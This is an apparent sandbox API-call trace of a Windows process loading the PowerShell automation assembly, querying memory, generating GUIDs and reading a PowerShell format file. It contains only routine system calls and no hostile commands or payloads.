	[0430.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.648] VirtualQuery (in: lpAddress=0x26b2c0, lpBuffer=0x26c180, dwLength=0x30 | out: lpBuffer=0x26c180*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.648] VirtualQuery (in: lpAddress=0x26b350, lpBuffer=0x26c210, dwLength=0x30 | out: lpBuffer=0x26c210*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.648] VirtualQuery (in: lpAddress=0x26b570, lpBuffer=0x26c430, dwLength=0x30 | out: lpBuffer=0x26c430*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.648] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x780c3c79, Data2=0xe43c, Data3=0x4cd3, Data4=([0]=0x85, [1]=0x4b, [2]=0xda, [3]=0xe4, [4]=0x63, [5]=0x39, [6]=0x5e, [7]=0xa5))) returned 0x0
	[0430.649] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x420851ce, Data2=0x5a41, Data3=0x48f8, Data4=([0]=0x83, [1]=0xae, [2]=0x10, [3]=0xe9, [4]=0x60, [5]=0x69, [6]=0xd, [7]=0xf0))) returned 0x0
	[0430.649] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x7d3bf1c9, Data2=0xda9e, Data3=0x4167, Data4=([0]=0x8b, [1]=0x13, [2]=0xda, [3]=0x53, [4]=0x61, [5]=0xed, [6]=0x29, [7]=0xf3))) returned 0x0
	[0430.649] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x66ab9615, Data2=0x68ec, Data3=0x4dad, Data4=([0]=0x88, [1]=0xaf, [2]=0xca, [3]=0xde, [4]=0xca, [5]=0x5a, [6]=0x7c, [7]=0x20))) returned 0x0
	[0430.649] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xb4ff60c4, Data2=0xf8df, Data3=0x416c, Data4=([0]=0xa5, [1]=0x1a, [2]=0x34, [3]=0x1b, [4]=0x6f, [5]=0x1f, [6]=0x14, [7]=0x9d))) returned 0x0
	[0430.649] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xe89c62e1, Data2=0x1b1c, Data3=0x4aa8, Data4=([0]=0xa1, [1]=0x86, [2]=0xc, [3]=0xc5, [4]=0x3c, [5]=0x90, [6]=0xd6, [7]=0xd8))) returned 0x0
	[0430.650] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1f0e261f, Data2=0x31bb, Data3=0x4ba5, Data4=([0]=0x88, [1]=0x16, [2]=0xfe, [3]=0xfb, [4]=0x40, [5]=0x5c, [6]=0xf9, [7]=0x15))) returned 0x0
	[0430.650] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x43a282af, Data2=0x6e12, Data3=0x48e7, Data4=([0]=0xab, [1]=0x6e, [2]=0x6f, [3]=0x9f, [4]=0x98, [5]=0xc2, [6]=0xc9, [7]=0xd6))) returned 0x0
	[0430.650] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.650] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.650] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.650] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.651] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.651] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.651] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.651] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.651] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.652] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.652] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.652] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.652] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.652] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.652] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.653] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.653] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.653] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.653] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.653] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.653] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1237c7cb, Data2=0x15f, Data3=0x4ac5, Data4=([0]=0x93, [1]=0x5b, [2]=0xc9, [3]=0x54, [4]=0x42, [5]=0x9c, [6]=0x14, [7]=0x13))) returned 0x0
	[0430.654] VirtualQuery (in: lpAddress=0x26ba40, lpBuffer=0x26c900, dwLength=0x30 | out: lpBuffer=0x26c900*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.654] VirtualQuery (in: lpAddress=0x26ba40, lpBuffer=0x26c900, dwLength=0x30 | out: lpBuffer=0x26c900*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.654] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.654] VirtualQuery (in: lpAddress=0x26ba40, lpBuffer=0x26c900, dwLength=0x30 | out: lpBuffer=0x26c900*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.654] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.654] VirtualQuery (in: lpAddress=0x26ba40, lpBuffer=0x26c900, dwLength=0x30 | out: lpBuffer=0x26c900*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.655] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.655] VirtualQuery (in: lpAddress=0x26ba40, lpBuffer=0x26c900, dwLength=0x30 | out: lpBuffer=0x26c900*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.655] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.655] VirtualQuery (in: lpAddress=0x26ba40, lpBuffer=0x26c900, dwLength=0x30 | out: lpBuffer=0x26c900*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.655] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.655] VirtualQuery (in: lpAddress=0x26ba40, lpBuffer=0x26c900, dwLength=0x30 | out: lpBuffer=0x26c900*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.656] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.656] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.656] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.656] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.656] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.656] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.657] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.657] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.657] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xcbe60fce, Data2=0xe5b9, Data3=0x4ea2, Data4=([0]=0xa1, [1]=0xb6, [2]=0x3f, [3]=0xb0, [4]=0xae, [5]=0xcd, [6]=0xa5, [7]=0x29))) returned 0x0
	[0430.657] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.657] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.658] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.659] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.659] VirtualQuery (in: lpAddress=0x26b700, lpBuffer=0x26c5c0, dwLength=0x30 | out: lpBuffer=0x26c5c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.659] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.659] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.659] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.660] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.660] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x53a0257d, Data2=0xe493, Data3=0x4b8c, Data4=([0]=0xa5, [1]=0xcd, [2]=0x71, [3]=0xbd, [4]=0xa5, [5]=0x2f, [6]=0x7b, [7]=0x12))) returned 0x0
	[0430.660] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6a9301fc, Data2=0x822b, Data3=0x45ef, Data4=([0]=0xad, [1]=0x1e, [2]=0xa8, [3]=0x9f, [4]=0x9c, [5]=0xb5, [6]=0xb5, [7]=0x24))) returned 0x0
	[0430.660] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x7c3fc4d1, Data2=0xf0f4, Data3=0x4661, Data4=([0]=0xb2, [1]=0x8d, [2]=0xd8, [3]=0x72, [4]=0xe5, [5]=0x89, [6]=0xcc, [7]=0x55))) returned 0x0
	[0430.660] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x125def98, Data2=0xc793, Data3=0x4174, Data4=([0]=0xac, [1]=0x5a, [2]=0xb7, [3]=0xf4, [4]=0xd6, [5]=0x42, [6]=0xd1, [7]=0x77))) returned 0x0
	[0430.661] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xd2b4af02, Data2=0x10ac, Data3=0x45e0, Data4=([0]=0xb5, [1]=0xf8, [2]=0x50, [3]=0xac, [4]=0xea, [5]=0xb9, [6]=0x9b, [7]=0x12))) returned 0x0
	[0430.661] VirtualQuery (in: lpAddress=0x26b810, lpBuffer=0x26c6d0, dwLength=0x30 | out: lpBuffer=0x26c6d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.661] VirtualQuery (in: lpAddress=0x26b8a0, lpBuffer=0x26c760, dwLength=0x30 | out: lpBuffer=0x26c760*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.661] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xb1d526ed, Data2=0xdaf0, Data3=0x4862, Data4=([0]=0xb0, [1]=0x4f, [2]=0x46, [3]=0xea, [4]=0x20, [5]=0xd9, [6]=0x43, [7]=0xe5))) returned 0x0
	[0430.661] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xe7349d69, Data2=0xfaf6, Data3=0x4b39, Data4=([0]=0xb5, [1]=0x53, [2]=0x4d, [3]=0x6d, [4]=0x40, [5]=0xb5, [6]=0xec, [7]=0x5b))) returned 0x0
	[0430.661] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x264e802, Data2=0x7603, Data3=0x445a, Data4=([0]=0x93, [1]=0xfd, [2]=0x80, [3]=0x51, [4]=0xa9, [5]=0x80, [6]=0x67, [7]=0x1e))) returned 0x0
	[0430.661] SetErrorMode (uMode=0x1) returned 0x1
	[0430.662] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.662] SetErrorMode (uMode=0x1) returned 0x1
	[0430.662] GetFileType (hFile=0x1c8) returned 0x1
	[0430.662] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.663] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.663] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.663] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
